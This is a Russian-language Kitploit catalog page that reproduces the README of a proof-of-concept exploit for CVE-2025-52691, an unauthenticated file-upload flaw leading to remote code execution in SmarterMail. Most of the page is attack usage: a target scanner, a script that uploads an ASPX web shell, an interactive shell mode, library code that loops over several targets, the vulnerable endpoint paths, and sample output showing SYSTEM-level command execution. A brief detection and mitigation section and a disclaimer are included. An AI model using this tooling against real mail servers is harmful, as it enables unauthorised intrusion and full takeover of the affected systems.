Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-52691-poc — Эксплойт для проверки концепции уязвимости CVE-2025-52691: неавторизованная загрузка произвольных файлов, приводящая к удаленному выполнению кода (RCE) в SmarterMail. Включает сканер уязвимостей, загрузчик веб-оболочек ASPX и интерактивную оболочку для авторизованного тестирования безопасности. | Kitploit
Инструменты/GitHubGitHub/rimbadirgantara/cve-2025-52691-poc
Сканеры уязвимостейГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияШелл-кодЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHub
rimbadirgantara/cve-2025-52691-poc

CVE-2025-52691-poc

Репозиторий
348 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →

Описание

Эксплойт для проверки концепции уязвимости CVE-2025-52691: неавторизованная загрузка произвольных файлов, приводящая к удаленному выполнению кода (RCE) в SmarterMail. Включает сканер уязвимостей, загрузчик веб-оболочек ASPX и интерактивную оболочку для авторизованного тестирования безопасности.

Поделиться

CVE-2025-52691 POC

Доказательство концепции для CVE-2025-52691 - SmarterMail: неавторизованная произвольная загрузка файлов (RCE)

⚠️ Отказ от ответственности

Только для авторизованного тестирования безопасности и образовательных целей. Несанкционированный доступ незаконен.

Обзор

Критическая уязвимость в SmarterMail, позволяющая неавторизованную произвольную загрузку файлов через path traversal, что приводит к удаленному выполнению кода.

Уязвимость: Path traversal в конечных точках загрузки позволяет загружать ASPX веб-шеллы в корень веб-сайта
Воздействие: Неавторизованное удаленное выполнение кода
Вектор: Сеть / Без аутентификации

Установка

root@kitploit:~
git clone https://github.com/yourusername/CVE-2025-52691-POC.git
cd CVE-2025-52691-POC
pip install requests urllib3

Инструменты

check.py - Сканер уязвимостей

Сканирует цели на наличие уязвимости CVE-2025-52691. Сохраняет только уязвимые URL в выходной файл.

root@kitploit:~
# Single target
python check.py https://mail.example.com

# Multiple targets
python check.py -f targets.txt -o results.txt

# Custom timeout
python check.py https://mail.example.com -t 30

Вывод: Один уязвимый URL на строку в results.txt

pwn.py - Инструмент эксплуатации

Загружает ASPX веб-шелл и обеспечивает выполнение команд.

root@kitploit:~
# Basic exploit
python pwn.py https://mail.example.com

# Execute command
python pwn.py https://mail.example.com -c "whoami"

# Interactive shell
python pwn.py https://mail.example.com -i

exploit.py - Библиотека Python

Модуль эксплуатации для многократного использования, предназначенный для интеграции в пользовательские скрипты.

В качестве библиотеки:

root@kitploit:~
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

# Basic usage
config = TargetConfig(base_url="https://mail.example.com")
exploit = SmarterMailExploit(config)

if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
    print(exploit.execute_command("whoami"))

# With custom timeout
config = TargetConfig(base_url="https://mail.example.com", timeout=60)
exploit = SmarterMailExploit(config)
result = exploit.exploit()

# Execute multiple commands
if result == ExploitResult.SHELL_UPLOADED:
    print(exploit.execute_command("whoami"))
    print(exploit.execute_command("hostname"))
    print(exploit.execute_command("ipconfig"))

В качестве автономного скрипта:

root@kitploit:~
# Import and run in Python
python -c "from exploit import *; e=SmarterMailExploit(TargetConfig('https://mail.example.com')); e.exploit()"

# Create custom script
cat << 'EOF' > my_exploit.py
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

targets = ['https://mail1.example.com', 'https://mail2.example.com']
for target in targets:
    config = TargetConfig(base_url=target)
    exploit = SmarterMailExploit(config)
    if exploit.exploit() == ExploitResult.SHELL_UPLOADED:
        print(f"[+] Exploited: {target}")
        print(exploit.execute_command("whoami"))
EOF
python my_exploit.py

Технические детали

Уязвимые конечные точки:

root@kitploit:~
/api/upload
/api/v1/upload
/Interface/Frmx/UploadFile.aspx
/MRS/Upload.ashx
/Services/Upload.ashx

Методы эксплуатации:

  • Multipart form upload with path traversal (../wwwroot/)
  • Raw POST with custom headers
  • JSON payload with base64-encoded content

Веб-шелл: Минимальный ASPX-шелл, принимающий команды через параметр ?cmd=

Порядок атаки

  1. Сканировать цель: python check.py <target>
  2. Эксплуатировать: python pwn.py <target> -i
  3. Выполнять команды в интерактивной оболочке

Обнаружение и смягчение

Обнаружение:

  • Мониторинг загрузки ASPX-файлов в веб-каталоги
  • Проверка логов на шаблоны path traversal (../)
  • Оповещение о неожиданных запросах /api/upload

Смягчение:

  • Обновить SmarterMail до последней версии
  • Реализовать строгую проверку путей файлов
  • Развернуть WAF с фильтрацией загрузок
  • Требовать аутентификацию на конечных точках загрузки

Пример

root@kitploit:~
$ python pwn.py https://mail.example.com -c "whoami"

[*] Target: https://mail.example.com
[+] Target is alive
[*] Shell filename: s4a7b3c2.aspx
[*] Attempting to upload webshell...
[+] SUCCESS! Webshell uploaded
[+] Shell URL: https://mail.example.com/s4a7b3c2.aspx

[*] Executing: whoami
[+] Output:
nt authority\system

Всегда получайте надлежащее разрешение перед тестированием.

Скачать инструмент